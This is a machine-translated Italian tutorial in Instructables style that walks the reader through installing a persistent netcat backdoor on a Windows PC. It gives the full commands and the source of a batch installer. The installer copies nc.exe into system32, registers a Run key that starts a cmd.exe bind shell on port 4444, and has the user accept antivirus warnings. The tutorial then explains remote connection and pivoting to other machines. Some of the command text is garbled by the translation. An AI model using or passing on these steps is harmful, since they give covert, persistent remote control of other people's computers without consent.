Netcat Fun!: 5 passaggi

2024 Autore: John Day | [email protected]. Ultima modifica: 2024-01-30 10:04

Questa istruzione ti mostra come creare una backdoor su un computer con netcat! Ti mostrerò due modi per farlo, con e senza il mio file batch che lo automatizza per te. Questa istruzione presuppone già che tu abbia già i permessi di root sul computer, probabilmente con un LiveCD 0phcrack qui. Ora, sull'istruibile.

Passaggio 1: scarica Netcat

Ti ho risparmiato la fatica di 3 minuti di ricerca su Google e ho inserito nc.exe su instructables per il download. Facoltativamente, puoi anche scaricare nc.bat che è un file batch che ho creato per automatizzare il processo per te. Assicurati che se scarichi nc.bat sia 464 byte, perché ho continuato a caricare versioni e ho scoperto che qualcosa non andava. Se non è 464 byte, il programma non corrisponderà a questo istruibile.

Passaggio 2: con Nc.bat

Innanzitutto, entrambi i file devono trovarsi nella stessa directory affinché nc.bat funzioni correttamente. Suggerisco di utilizzare un'unità flash o un CD-ROM per questa operazione. Ho usato un'unità flash geek squad da 512 MB per questo, ma sono solo io. Quindi, copia i file sul tuo dispositivo multimediale esterno e portali sul computer su cui hai root. Accedi al dispositivo multimediale e fai doppio clic su nc.bat. Questo copierà il file nc.exe nella cartella system32, nella root di sistema (di solito C:\Windows o C:\WINNT) e apporterà le modifiche necessarie al registro. Quindi annotare l'indirizzo IP. Sarà qualcosa come "192.168.1.103", che è mio. Fatto ciò riavviare la macchina ed effettuare il login. Quindi il programma antivirus potrebbe chiederti se desideri consentire/disabilitare il programma. Fare clic su "Consenti" o simili. Tieni presente che in questa istruzione puoi accedere tramite telnet solo dalla rete locale di quel computer. Quindi esci, o disconnettiti, o qualsiasi altra cosa tu voglia.

Passaggio 3: senza Nc.bat

Per fare ciò, devi avere nc.exe su un CD o un'unità Flash. Vai al computer, accedi e collega l'unità flash o inserisci il tuo CD. Da qui, ci sono due modi: le interfacce utente grafiche rifinite di Windows o il modo sporco e antiquato del prompt dei comandi. Il modo sporco e antiquato del prompt dei comandi: richiamare il prompt dei comandi andando su StartRun e digita:

cmd.exeNaviga verso il flash o l'unità CD. Se non sai quale unità è quale, fai clic con il pulsante destro del mouse sul pulsante di avvio e fai clic su Esplora. Fare clic su tutte le unità non locali in Risorse del computer finché non si arriva all'unità flash/CD. Ricorda la lettera dell'unità e torna al prompt dei comandi. Digita la lettera dell'unità seguita da due punti, in questo modo: K: Quindi digita una riga alla volta, quindi premi il tasto Invio

copia nc.exe %systemroot%\system32\nc.exereg aggiungi HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\nc.exe -L -d -p 4444 - t -e cmd.exe"Questa era praticamente l'installazione. Tutto quello che devi sapere ora è l'indirizzo IP locale, che può essere facilmente trovato digitando il comando 'ipconfig' e cercando qualcosa nella tabella come "192.168.1.103". Quindi riavvia la macchina e accedi di nuovo. Il programma antivirus potrebbe chiederti se vuoi consentire/non consentire. Fare clic su consenti. Quindi sei libero di fare ciò che vuoi con il computer. Le interfacce grafiche rifinite di Windows Fai clic con il pulsante destro del mouse sul pulsante di avvio e fai clic su Esplora. Fare clic su tutte le unità non locali in Risorse del computer finché non si arriva all'unità flash/CD. Quindi fare clic con il pulsante destro del mouse su nc.exe e copiare. Quindi vai all'unità C e fai clic sulla cartella Windows o WINNT. Quindi vai alla cartella system32 e incolla nc.exe. Chiudilo e vai su StartRun. Digita regedit. Navigare attraverso le cartelle fino a: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunQuindi fare clic con il pulsante destro del mouse su uno spazio vuoto e andare su NewString Value. Digita quello che vuoi per il nome, ma per il valore, digita

%systemroot%\system32\nc.exe -L -d -p 4444 -t -e cmd.exeQuesta era praticamente l'installazione. Tutto quello che devi sapere ora è l'indirizzo IP locale, che può essere facilmente trovato digitando il comando 'ipconfig' nel prompt dei comandi (StartRun:cmd.exe) e cercando qualcosa nella tabella come "192.168.1.103". Quindi riavvia la macchina e accedi di nuovo. Il programma antivirus potrebbe chiederti se vuoi consentire/non consentire. Fare clic su consenti. Quindi sei libero di fare quello che vuoi con il computer.

Passaggio 4: tornare indietro

Una volta installato e vuoi assumere il controllo dell'host, apri il prompt dei comandi o PuTTY. Penso che PuTTY sia fantastico, quindi ti permetterò di scaricarlo qui. Usando PuTTY Scarica e apri PuTTY.exe. Fare clic sul protocollo "grezzo". Nella casella di testo n. porta, digitare 4444. Nella casella "indirizzo host", digitare l'indirizzo IP annotato durante l'installazione. Quindi premi invio. PuTTY dovrebbe connettersi alla scatola e otterrai un prompt dei comandi. Usando il prompt dei comandiApri il prompt dei comandi e digita "telnet 4444". Quindi premi invio e dovresti ottenere un prompt dei comandi. Ciò ti consentirà di fare quasi tutto ciò che vuoi sul computer in remoto che puoi fare con un account locale. Inizia davvero a diventare interessante quando entri in un computer, e poi entri in un altro computer da quel computer, per ottenere un'intera catena di computer collegati insieme. Divertiti (legale)!

Passaggio 5: codice sorgente

Poiché mi è stato chiesto, inserirò il codice sorgente (per il file batch) e spiegherò ogni comando e cosa fa. Sii consapevole! Questa è la versione corrente del programma di installazione batch. Se il tuo è diverso, il codice sarà diverso.

@echo offcopy nc.exe %systemroot%\system32\nc.exeif errorlevel 0 vai a regeditgoto error:regeditreg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\nc. exe -L -d -p 4444 -t -e cmd.exe"if errorlevel 0 goto ip:errorecho si è verificato qualcosa di imprevisto e il programma deve uscire.goto end:ipecho annotare l'indirizzo IP da tableipconfig:endecho end.echo nastro adesivo fuori.pausa@echo off: gli dice di non mostrare i comandi durante l'esecuzione.copy nc.exe %systemroot%\system32\nc.exe-di solito copia netcat in C:\WINDOWS\system32. Questo lo rende così quando torni, invece di cambiare directory tutto il tempo, puoi semplicemente digitare "nc" per aprire un'altra porta. if errorlevel 0 goto regedit-error check. Se la copia è andata a buon fine, si passa alla modifica del registro.goto error-Se si è verificato un errore, si passa all'etichetta:error label.:regedit-A, specificando che quando il programma dice "goto regedit", andare qui.reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v nc /d "%systemroot%\system32\nc.exe -L -d -p 4444 -t -e cmd.exe"-(dovrebbe essere essere una riga) che aggiunge la chiave di registro per riavviare il programma al riavvio. /f significa sovrascrivere la chiave esistente, /v per il nome della chiave, /d per i dati. Il resto dei tag viene immesso per netcat. -L dice di riavviarlo all'uscita, quindi non devi aspettare il riavvio del computer. -d ho dimenticato. -p 4444 specifica la porta #. -t ho dimenticato. -e cmd.exe avvia il prompt dei comandi sulla connessione remota. Se errorlevel 0 vai a ip-error checking. Se l'esecuzione è andata male salterebbe questa riga e andrebbe a:error label.echo si è verificato qualcosa di imprevisto e il programma deve uscire.-dice al programma di stampare "si è verificato qualcosa di imprevisto e il programma deve uscire " su screen.goto end-se è andato al messaggio di errore, qualcosa è andato storto e il programma deve chiudersi comunque.:ip-Ancora, label.echo annota l'indirizzo IP dalla tabella-Scrive "scrivi l'IP indirizzo dalla tabella" allo screen.ipconfig-Questo è un comando che stampa le informazioni sulle impostazioni della rete locale (LAN).:end-Label.echo end.-scrive "end" sul nastro adesivo screen.echo. -scrive "nastro adesivo" sullo screen.pause-questo comando mette in pausa il programma e attende che l'utente prema un tasto. In questo programma, attende l'input e quindi esce dal programma.